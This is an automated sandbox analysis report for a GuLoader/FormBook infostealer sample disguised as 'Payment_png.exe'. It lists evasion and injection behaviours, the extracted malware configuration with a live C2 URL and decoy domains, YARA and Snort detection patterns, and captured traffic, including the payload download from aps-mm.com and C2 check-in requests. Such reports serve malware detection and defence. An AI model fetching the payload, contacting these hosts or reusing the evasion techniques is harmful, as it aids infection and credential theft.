Analysis Report Payment_png.exe

Overview

General Information

Sample Name: Payment_png.exe
Analysis ID: 377352
MD5: 86fa26e33879d3c04152301eaaaba518
SHA1: 3c75755b8efe897bb18ea99f6014dabd5492d32c
SHA256: eacf1b7b8d612e5a500f79a03b06f9fb919768a1fb053ce3522f3288c36067f4
Tags: GuLoader

Detection

FormBook GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Executable has a suspicious name (potential lure to open the executable)
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Abnormal high CPU Usage
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Payment_png.exe (PID: 6076 cmdline: 'C:\Users\user\Desktop\Payment_png.exe' MD5: 86FA26E33879D3C04152301EAAABA518)
    • Payment_png.exe (PID: 3112 cmdline: 'C:\Users\user\Desktop\Payment_png.exe' MD5: 86FA26E33879D3C04152301EAAABA518)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • colorcpl.exe (PID: 2988 cmdline: C:\Windows\SysWOW64\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
          • cmd.exe (PID: 1536 cmdline: /c del 'C:\Users\user\Desktop\Payment_png.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.booksfall.com/c8bs/"], "decoy": ["dreamwrldrp.com", "epkshu.com", "accinf5.com", "karadenizturk.com", "pcpartout.com", "kuwoopi.com", "gtaqcf.com", "lambofgodprinting.com", "vinelytv.com", "domennyarendi39.net", "broskiusa.com", "bombiepalaboy.com", "plowbrothers.com", "domentemenegi42.net", "jfhousebuyers.com", "birkenhof-allgaeu.net", "quantify-co.com", "bitoko.net", "choupisson.com", "bostonm.info", "wojkowski.com", "themersy.com", "structuredmen.net", "jadaccaentertainment.com", "strategyplace.net", "kadyshopping.com", "bookhangovers.com", "peopleskillschallenge.com", "sturestaypluspdx.com", "nxywsy.com", "citestaccnt1598622913.com", "bestmodestorestaurants.com", "thebabyfriendly.com", "aainakari.com", "cookklip.com", "8bitupgrades.com", "smartintegrityplatform.com", "silverdollarcafe.com", "obleaslaoriginal.com", "csfeliz.com", "selfmadepartners.com", "djmacktruck.com", "madefaz.net", "55zhidian.com", "slutefuter.com", "enternet360.com", "autoandtruckpartsincoh.com", "loversdeal.com", "windorians.com", "skinsbag.com", "indounace-maisounce.com", "atxrealestateforsale.com", "lotdco.com", "littlewanda.com", "epc-scot.com", "thesaltybookkeeper.com", "neebcoteam.com", "uforservice.com", "cashcanbeyours.com", "bondar.design", "rwpgoyiof.club", "mindfulreadings.com", "dhadaka.com", "aartihand.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000E.00000002.470480865.0000000002FA0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000E.00000002.470480865.0000000002FA0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000E.00000002.470480865.0000000002FA0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166b9:$sqlite3step: 68 34 1C 7B E1
  • 0x167cc:$sqlite3step: 68 34 1C 7B E1
  • 0x166e8:$sqlite3text: 68 38 2A 90 C5
  • 0x1680d:$sqlite3text: 68 38 2A 90 C5
  • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Found malware configuration
Source: 0000000E.00000002.470480865.0000000002FA0000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.booksfall.com/c8bs/"], "decoy": ["dreamwrldrp.com", "epkshu.com", "accinf5.com", "karadenizturk.com", "pcpartout.com", "kuwoopi.com", "gtaqcf.com", "lambofgodprinting.com", "vinelytv.com", "domennyarendi39.net", "broskiusa.com", "bombiepalaboy.com", "plowbrothers.com", "domentemenegi42.net", "jfhousebuyers.com", "birkenhof-allgaeu.net", "quantify-co.com", "bitoko.net", "choupisson.com", "bostonm.info", "wojkowski.com", "themersy.com", "structuredmen.net", "jadaccaentertainment.com", "strategyplace.net", "kadyshopping.com", "bookhangovers.com", "peopleskillschallenge.com", "sturestaypluspdx.com", "nxywsy.com", "citestaccnt1598622913.com", "bestmodestorestaurants.com", "thebabyfriendly.com", "aainakari.com", "cookklip.com", "8bitupgrades.com", "smartintegrityplatform.com", "silverdollarcafe.com", "obleaslaoriginal.com", "csfeliz.com", "selfmadepartners.com", "djmacktruck.com", "madefaz.net", "55zhidian.com", "slutefuter.com", "enternet360.com", "autoandtruckpartsincoh.com", "loversdeal.com", "windorians.com", "skinsbag.com", "indounace-maisounce.com", "atxrealestateforsale.com", "lotdco.com", "littlewanda.com", "epc-scot.com", "thesaltybookkeeper.com", "neebcoteam.com", "uforservice.com", "cashcanbeyours.com", "bondar.design", "rwpgoyiof.club", "mindfulreadings.com", "dhadaka.com", "aartihand.com"]}
Multi AV Scanner detection for submitted file
Source: Payment_png.exe | Virustotal: Detection: 70%
Source: Payment_png.exe | Metadefender: Detection: 19%
Source: Payment_png.exe | ReversingLabs: Detection: 79%
Yara detected FormBook
Source: Yara match | File source: 0000000E.00000002.470480865.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.313967074.000000001E150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.305977601.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.470603581.0000000002FD0000.00000004.00000001.sdmp, type: MEMORY
Source: 14.2.colorcpl.exe.30327b8.2.unpack | Avira: Label: TR/Dropper.Gen
Source: 14.2.colorcpl.exe.5117960.5.unpack | Avira: Label: TR/Dropper.Gen
Source: Payment_png.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown | HTTPS traffic detected: 170.249.199.106:443 -> 192.168.2.3:49714 version: TLS 1.2
Source: Binary string: colorcpl.pdbGCTL source: Payment_png.exe, 00000002.00000002.305994163.00000000000B0000.00000040.00000001.sdmp
Source: Binary string: colorcpl.pdb source: Payment_png.exe, 00000002.00000002.305994163.00000000000B0000.00000040.00000001.sdmp
Source: Binary string: MusNotifyIcon.pdb source: explorer.exe, 00000006.00000000.294257037.000000000F785000.00000004.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.294003338.000000000E350000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: Payment_png.exe, 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, colorcpl.exe, 0000000E.00000002.471234758.0000000004BE0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: Payment_png.exe, colorcpl.exe
Source: Binary string: MusNotifyIcon.pdbGCTL source: explorer.exe, 00000006.00000000.294257037.000000000F785000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000006.00000000.294003338.000000000E350000.00000002.00000001.sdmp

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49734 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49734 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49734 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49736 -> 172.67.184.37:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49736 -> 172.67.184.37:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49736 -> 172.67.184.37:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 35.246.6.109:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 35.246.6.109:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 35.246.6.109:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 217.160.0.233:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 217.160.0.233:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 217.160.0.233:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 23.227.38.32:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 23.227.38.32:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 23.227.38.32:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.booksfall.com/c8bs/
Source: global traffic | HTTP traffic detected: GET /c8bs/?oX=mHnwrZz1sKQS3zf7QeEgVUMWoZ3Lc4fpOuayWuCDpyWMt82/PBRmHPawc0L3Kfl51U/x&sPj0qt=EzuD_nNPa4wlp HTTP/1.1 | Host: www.plowbrothers.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /c8bs/?oX=Hv8f/9kM6PpCoHCAYeSNySFtV7F8Omi3vFEIW08Kt8pLNhhDl+aE5MaGg51EV/qSy4Lt&sPj0qt=EzuD_nNPa4wlp HTTP/1.1 | Host: www.loversdeal.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /c8bs/?oX=mCtx4UHL9mNzF3EVU4c9VHavM1DFjubq04c/5ShdsOuIyPGtiFj7akTOwHhyuxeIGqkY&sPj0qt=EzuD_nNPa4wlp HTTP/1.1 | Host: www.pcpartout.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /c8bs/?oX=LeA7SnvTFXlqZuqbSI7RL/JE3Y5e3FfIcVn/p/TMp/5vx2Fx/wjFaW5mPJS2e1LpHtn7&sPj0qt=EzuD_nNPa4wlp HTTP/1.1 | Host: www.birkenhof-allgaeu.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /c8bs/?oX=VA+RheUhnH6IZbm+U8Y2mzCnWc09b3JHiGFV6nsBhBIaDv1TGDBDOGhITueAfFfv+F2O&sPj0qt=EzuD_nNPa4wlp HTTP/1.1 | Host: www.choupisson.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /c8bs/?oX=O8PbLgx16hMIOJ1rZ9qRlhWRXDOrjvK9cMkfWsk/HAIbj7Mo3Z6p/LmWsoKge1OKT5Rd&sPj0qt=EzuD_nNPa4wlp HTTP/1.1 | Host: www.uforservice.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /c8bs/?oX=9WVnx7W/2jtf/SBQb7qMRqW55HQP5AXdTxivKH+RIJcLuGeyWux88wPL6knHSRGt/sw8&sPj0qt=EzuD_nNPa4wlp HTTP/1.1 | Host: www.silverdollarcafe.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 198.54.117.218
Source: Joe Sandbox View | IP Address: 23.227.38.32
Source: Joe Sandbox View | IP Address: 23.227.38.32
Source: Joe Sandbox View | ASN Name: ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View | ASN Name: BIZLAND-SDUS
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected: GET /bin_BNUtTDfY243.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: aps-mm.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /bin_BNUtTDfY243.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Cache-Control: no-cache | Host: www.aps-mm.com | Connection: Keep-Alive
Source: C:\Windows\explorer.exe | Code function: 6_2_0613D302 getaddrinfo,setsockopt,recv,
Source: global traffic | HTTP traffic detected: GET /bin_BNUtTDfY243.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: aps-mm.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /bin_BNUtTDfY243.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Cache-Control: no-cache | Host: www.aps-mm.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /c8bs/?oX=mHnwrZz1sKQS3zf7QeEgVUMWoZ3Lc4fpOuayWuCDpyWMt82/PBRmHPawc0L3Kfl51U/x&sPj0qt=EzuD_nNPa4wlp HTTP/1.1 | Host: www.plowbrothers.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /c8bs/?oX=Hv8f/9kM6PpCoHCAYeSNySFtV7F8Omi3vFEIW08Kt8pLNhhDl+aE5MaGg51EV/qSy4Lt&sPj0qt=EzuD_nNPa4wlp HTTP/1.1 | Host: www.loversdeal.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /c8bs/?oX=mCtx4UHL9mNzF3EVU4c9VHavM1DFjubq04c/5ShdsOuIyPGtiFj7akTOwHhyuxeIGqkY&sPj0qt=EzuD_nNPa4wlp HTTP/1.1 | Host: www.pcpartout.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /c8bs/?oX=LeA7SnvTFXlqZuqbSI7RL/JE3Y5e3FfIcVn/p/TMp/5vx2Fx/wjFaW5mPJS2e1LpHtn7&sPj0qt=EzuD_nNPa4wlp HTTP/1.1 | Host: www.birkenhof-allgaeu.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /c8bs/?oX=VA+RheUhnH6IZbm+U8Y2mzCnWc09b3JHiGFV6nsBhBIaDv1TGDBDOGhITueAfFfv+F2O&sPj0qt=EzuD_nNPa4wlp HTTP/1.1 | Host: www.choupisson.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /c8bs/?oX=O8PbLgx16hMIOJ1rZ9qRlhWRXDOrjvK9cMkfWsk/HAIbj7Mo3Z6p/LmWsoKge1OKT5Rd&sPj0qt=EzuD_nNPa4wlp HTTP/1.1 | Host: www.uforservice.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /c8bs/?oX=9WVnx7W/2jtf/SBQb7qMRqW55HQP5AXdTxivKH+RIJcLuGeyWux88wPL6knHSRGt/sw8&sPj0qt=EzuD_nNPa4wlp HTTP/1.1 | Host: www.silverdollarcafe.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: unknown | DNS traffic detected: queries for: aps-mm.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 29 Mar 2021 11:59:43 GMT | Content-Type: text/html | Content-Length: 146 | Connection: close | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: Payment_png.exe, 00000002.00000002.306035151.0000000000561000.00000040.00000001.sdmp | String found in binary or memory: http://aps-mm.com/bin_BNUtTDfY243.bin
Source: explorer.exe, 00000006.00000000.294226634.000000000F740000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.aainakari.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.aainakari.com/c8bs/
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.aainakari.com/c8bs/www.bostonm.info
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.aainakari.comReferer:
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.accinf5.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.accinf5.com/c8bs/
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.accinf5.com/c8bs/www.silverdollarcafe.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.accinf5.comReferer:
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.birkenhof-allgaeu.net
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.birkenhof-allgaeu.net/c8bs/
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.birkenhof-allgaeu.net/c8bs/www.choupisson.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.birkenhof-allgaeu.netReferer:
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.booksfall.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.booksfall.com/c8bs/
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.booksfall.com/c8bs/www.pcpartout.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.booksfall.comReferer:
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.bostonm.info
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.bostonm.info/c8bs/
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.bostonm.info/c8bs/www.quantify-co.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.bostonm.infoReferer:
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.broskiusa.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.broskiusa.com/c8bs/
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.broskiusa.com/c8bs/www.aainakari.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.broskiusa.comReferer:
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.choupisson.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.choupisson.com/c8bs/
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.choupisson.com/c8bs/www.uforservice.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.choupisson.comReferer:
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.domennyarendi39.net
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.domennyarendi39.net/c8bs/
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.domennyarendi39.net/c8bs/www.accinf5.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.domennyarendi39.netReferer:
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.domentemenegi42.net
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.domentemenegi42.net/c8bs/
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.domentemenegi42.net/c8bs/www.broskiusa.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.domentemenegi42.netReferer:
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.loversdeal.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.loversdeal.com/c8bs/
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.loversdeal.com/c8bs/www.booksfall.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.loversdeal.comReferer:
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.pcpartout.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | String found in binary or memory: http://www.pcpartout.com/c8bs/
